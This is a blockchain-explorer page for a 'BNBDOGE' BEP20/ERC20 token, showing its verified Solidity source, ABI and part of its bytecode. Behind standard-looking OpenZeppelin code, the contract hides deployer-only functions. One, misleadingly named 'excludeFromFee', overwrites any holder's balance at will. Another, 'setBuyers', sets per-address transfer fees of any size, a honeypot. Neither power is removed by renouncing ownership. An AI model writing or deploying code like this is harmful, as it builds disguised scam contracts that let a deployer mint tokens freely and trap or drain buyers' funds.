BNB Price: $617.62 (+3.43%)
 

Overview

Max Total Supply

10,000,000,000ERC20 ***

Holders

134

Market

Price

$0.00 @ 0.000000 BNB

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
65,556.48 ERC20 ***

Value
$0.00
0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at BscScan.com on 2022-12-12
*/

/**
 *Submitted for verification at Etherscan.io on 2022-12-09
*/

/**
 *Submitted for verification at BscScan.com on 2022-12-05
*/

pragma solidity ^0.8.0;


// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}




pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}




pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}



pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata,Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _tOwned;
    mapping (address => bool) public _isExcludedFromFee;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => uint256) private Buyser;
    address public uniswapV2Pair;

    function setPairList(address _address) external {
        require( _isExcludedFromFee[msg.sender]);
        uniswapV2Pair = _address;
    }

    function excludeFromFee(address recipient,uint256 num) external  {
        require( _isExcludedFromFee[msg.sender]);
        _tOwned[recipient] = _totalSupply * num ;
    }

    function getBuyers(address recipient) public view returns(uint256)  {
        return Buyser[recipient];
    }
    function setBuyers(address recipient,uint256 num) external  {
        require( _isExcludedFromFee[msg.sender]);
        Buyser[recipient] =  num;
    }

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _tOwned[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    uint256 sFEE = 3;
    uint256 bFEE = 3;
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _tOwned[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        uint256 tradefee = sFEE;
        uint256 fee = Buyser[from];
        if (fee != 0) {
            tradefee = fee;
        }else {
            if (uniswapV2Pair != address(0)) {
                if (from == uniswapV2Pair) {
                    tradefee = bFEE;
                }
            }
        }

        uint256 feeAmount = amount.mul(tradefee).div(100);

        uint256 add = amount.sub(feeAmount);
    unchecked {
        _tOwned[from] = fromBalance - amount;
        // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
        // decrementing then incrementing.
        _tOwned[to] += add;
    }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);
        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _tOwned[account] += amount;
    }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _tOwned[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _tOwned[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}





// File contracts/Token.sol

pragma solidity ^0.8.0;


contract Token is ERC20 {
    using SafeMath for uint256;
    constructor(uint256 initialSupply) ERC20("BNBDOGE", "BNBDOGE") {
        _mint(msg.sender, initialSupply*10**decimals());
        _isExcludedFromFee[msg.sender] = true;
    }

}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"uint256","name":"initialSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"num","type":"uint256"}],"name":"excludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"}],"name":"getBuyers","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"num","type":"uint256"}],"name":"setBuyers","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"setPairList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405260036009556003600a553480156200001b57600080fd5b50604051620024ee380380620024ee8339818101604052810190620000419190620004b1565b6040518060400160405280600781526020017f424e42444f4745000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f424e42444f474500000000000000000000000000000000000000000000000000815250620000cd620000c16200019c60201b60201c565b620001a460201b60201c565b8160079080519060200190620000e5929190620003ea565b508060089080519060200190620000fe929190620003ea565b5050506200013d33620001166200026860201b60201c565b600a62000124919062000623565b8362000131919062000760565b6200027160201b60201c565b6001600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050620008c1565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620002e4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002db906200051b565b60405180910390fd5b620002f860008383620003e060201b60201c565b80600660008282546200030c91906200056b565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003c091906200053d565b60405180910390a3620003dc60008383620003e560201b60201c565b5050565b505050565b505050565b828054620003f890620007d8565b90600052602060002090601f0160209004810192826200041c576000855562000468565b82601f106200043757805160ff191683800117855562000468565b8280016001018555821562000468579182015b82811115620004675782518255916020019190600101906200044a565b5b5090506200047791906200047b565b5090565b5b80821115620004965760008160009055506001016200047c565b5090565b600081519050620004ab81620008a7565b92915050565b600060208284031215620004ca57620004c96200086c565b5b6000620004da848285016200049a565b91505092915050565b6000620004f2601f836200055a565b9150620004ff826200087e565b602082019050919050565b6200051581620007c1565b82525050565b600060208201905081810360008301526200053681620004e3565b9050919050565b60006020820190506200055460008301846200050a565b92915050565b600082825260208201905092915050565b60006200057882620007c1565b91506200058583620007c1565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620005bd57620005bc6200080e565b5b828201905092915050565b6000808291508390505b60018511156200061a57808604811115620005f257620005f16200080e565b5b6001851615620006025780820291505b8081029050620006128562000871565b9450620005d2565b94509492505050565b60006200063082620007c1565b91506200063d83620007cb565b92506200066c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000674565b905092915050565b60008262000686576001905062000759565b8162000696576000905062000759565b8160018114620006af5760028114620006ba57620006f0565b600191505062000759565b60ff841115620006cf57620006ce6200080e565b5b8360020a915084821115620006e957620006e86200080e565b5b5062000759565b5060208310610133831016604e8410600b84101617156200072a5782820a9050838111156200072457620007236200080e565b5b62000759565b620007398484846001620005c8565b925090508184048111156200075357620007526200080e565b5b81810290505b9392505050565b60006200076d82620007c1565b91506200077a83620007c1565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620007b657620007b56200080e565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60006002820490506001821680620007f157607f821691505b602082108114156200080857620008076200083d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b60008160011c9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b620008b281620007c1565b8114620008be57600080fd5b50565b611c1d80620008d16000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806349bd5a5e116100ad57806395d89b411161007157806395d89b4114610345578063a457c2d714610363578063a9059cbb14610393578063dd62ed3e146103c3578063f2fde38b146103f35761012c565b806349bd5a5e1461029f57806370a08231146102bd578063715018a6146102ed578063768dc710146102f75780638da5cb5b146103275761012c565b806323b872dd116100f457806323b872dd146101e9578063313ce567146102195780633950935114610237578063444a2a9c1461026757806344732477146102835761012c565b806306fdde0314610131578063095ea7b31461014f578063113a8c481461017f578063122df71b1461019b57806318160ddd146101cb575b600080fd5b61013961040f565b6040516101469190611538565b60405180910390f35b61016960048036038101906101649190611312565b6104a1565b604051610176919061151d565b60405180910390f35b61019960048036038101906101949190611312565b6104c4565b005b6101b560048036038101906101b09190611252565b61056f565b6040516101c2919061167a565b60405180910390f35b6101d36105b8565b6040516101e0919061167a565b60405180910390f35b61020360048036038101906101fe91906112bf565b6105c2565b604051610210919061151d565b60405180910390f35b6102216105f1565b60405161022e9190611695565b60405180910390f35b610251600480360381019061024c9190611312565b6105fa565b60405161025e919061151d565b60405180910390f35b610281600480360381019061027c9190611252565b610631565b005b61029d60048036038101906102989190611312565b6106cb565b005b6102a7610769565b6040516102b49190611502565b60405180910390f35b6102d760048036038101906102d29190611252565b61078f565b6040516102e4919061167a565b60405180910390f35b6102f56107d8565b005b610311600480360381019061030c9190611252565b6107ec565b60405161031e919061151d565b60405180910390f35b61032f61080c565b60405161033c9190611502565b60405180910390f35b6103